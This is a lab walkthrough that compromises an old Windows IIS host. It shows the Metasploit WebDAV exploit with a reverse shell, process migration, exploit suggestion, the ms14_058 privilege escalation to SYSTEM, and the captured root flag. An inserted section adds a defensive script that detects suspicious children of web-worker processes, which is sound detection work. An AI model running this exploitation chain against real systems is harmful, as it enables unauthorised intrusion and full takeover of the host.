# Exploitation

## Metasploit Exploitation

```
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl

set RHOST 10.10.10.14
set LHOST tun0 
run 
```

![](/files/-MMvSTC_0X8mzxD_VMUw)

We have a shell, but when we try to run *getuid* it fails with an error. This means we are running inside an unstable process. To fix this, we check which processes are running on the box and migrate to one that runs with the same privileges as the meterpreter session.

```
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 276   4     smss.exe                                                        
 324   276   csrss.exe                                                       
 348   276   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 584   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 740   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1104  1852  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 1124  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1324  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1492  348   logon.scr                                                       
 1628  396   alg.exe                                                         
 1664  396   svchost.exe                                                     
 1796  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1852  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 1916  396   dllhost.exe                                                     
 2304  584   wmiprvse.exe                                                    
 2692  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3872  1084  cidaemon.exe                                                    
 3916  1084  cidaemon.exe                                                    
 3944  1084  cidaemon.exe                                                    

```

```
migrate 1852
```
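The process list above is also worth reading from the defender's side: PID 1104 is `rundll32.exe` whose parent (PPID 1852) is the IIS worker `w3wp.exe`, which is exactly the web-server-spawns-a-LOLBin pattern that EDR and Sysmon rules alert on. The following is an added example, not part of the original writeup or of Metasploit; it parses an abridged copy of the `ps` listing (constructed from the page) and flags suspicious children of web-worker processes. The same PID/PPID/name logic applies to any process inventory exported from an endpoint agent.

```python
import re

# Constructed sample: an abridged copy of the meterpreter `ps` listing from this page.
PS_OUTPUT = r"""
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 4     0     System
 396   348   services.exe
 584   396   svchost.exe
 1104  1852  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 1456  396   svchost.exe
 1796  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1852  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2692  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
"""

# Web-server worker processes that have no business spawning shells or LOLBins.
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe", "httpd.exe"}
# Binaries commonly seen as post-exploitation children of a web worker.
SUSPICIOUS_CHILDREN = {"rundll32.exe", "cmd.exe", "powershell.exe", "regsvr32.exe", "mshta.exe"}

# Only the first three columns (PID, PPID, Name) are needed; header and ruler rows do not match.
ROW = re.compile(r"^\s*(\d+)\s+(\d+)\s+(\S+)")


def parse_ps(text):
    """Return {pid: (ppid, name)} from a meterpreter `ps` dump (names lower-cased)."""
    procs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3).lower())
    return procs


def find_web_shell_children(procs):
    """Return (child_pid, child_name, parent_pid, parent_name) for suspicious children of web workers."""
    hits = []
    for pid, (ppid, name) in procs.items():
        parent = procs.get(ppid)
        if parent and parent[1] in WEB_WORKERS and name in SUSPICIOUS_CHILDREN:
            hits.append((pid, name, ppid, parent[1]))
    return hits


if __name__ == "__main__":
    for hit in find_web_shell_children(parse_ps(PS_OUTPUT)):
        print("suspicious: pid %d %s spawned by pid %d %s" % hit)
```

Note that this is a point-in-time indicator: once the session is migrated into `w3wp.exe` itself, the rundll32 child disappears and the tree looks clean again, so process-tree checks need to be paired with process-creation telemetry rather than periodic snapshots.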

![](/files/-MMvTjv0KRGn6ivJJg0X)

Now we have a stable, working meterpreter session. We only have low privileges, however, and need to escalate to SYSTEM. Put the session in the **background** and use the local exploit suggester, *local_exploit_suggester*.

```
search local_exploit_suggester
use local_exploit_suggester
set SESSION 1
run

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

use exploit/windows/local/ms14_058_track_popup_menu
set SESSION 1
set LHOST tun0 
run
shell
```

```
meterpreter > shell
Process 1080 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>cd C:\Documents and Settings\Administrator
cd C:\Documents and Settings\Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  04:28 PM    <DIR>          .
04/12/2017  04:28 PM    <DIR>          ..
04/12/2017  04:29 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,487,232 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
C:\Documents and Settings\Administrator\Desktop>

```
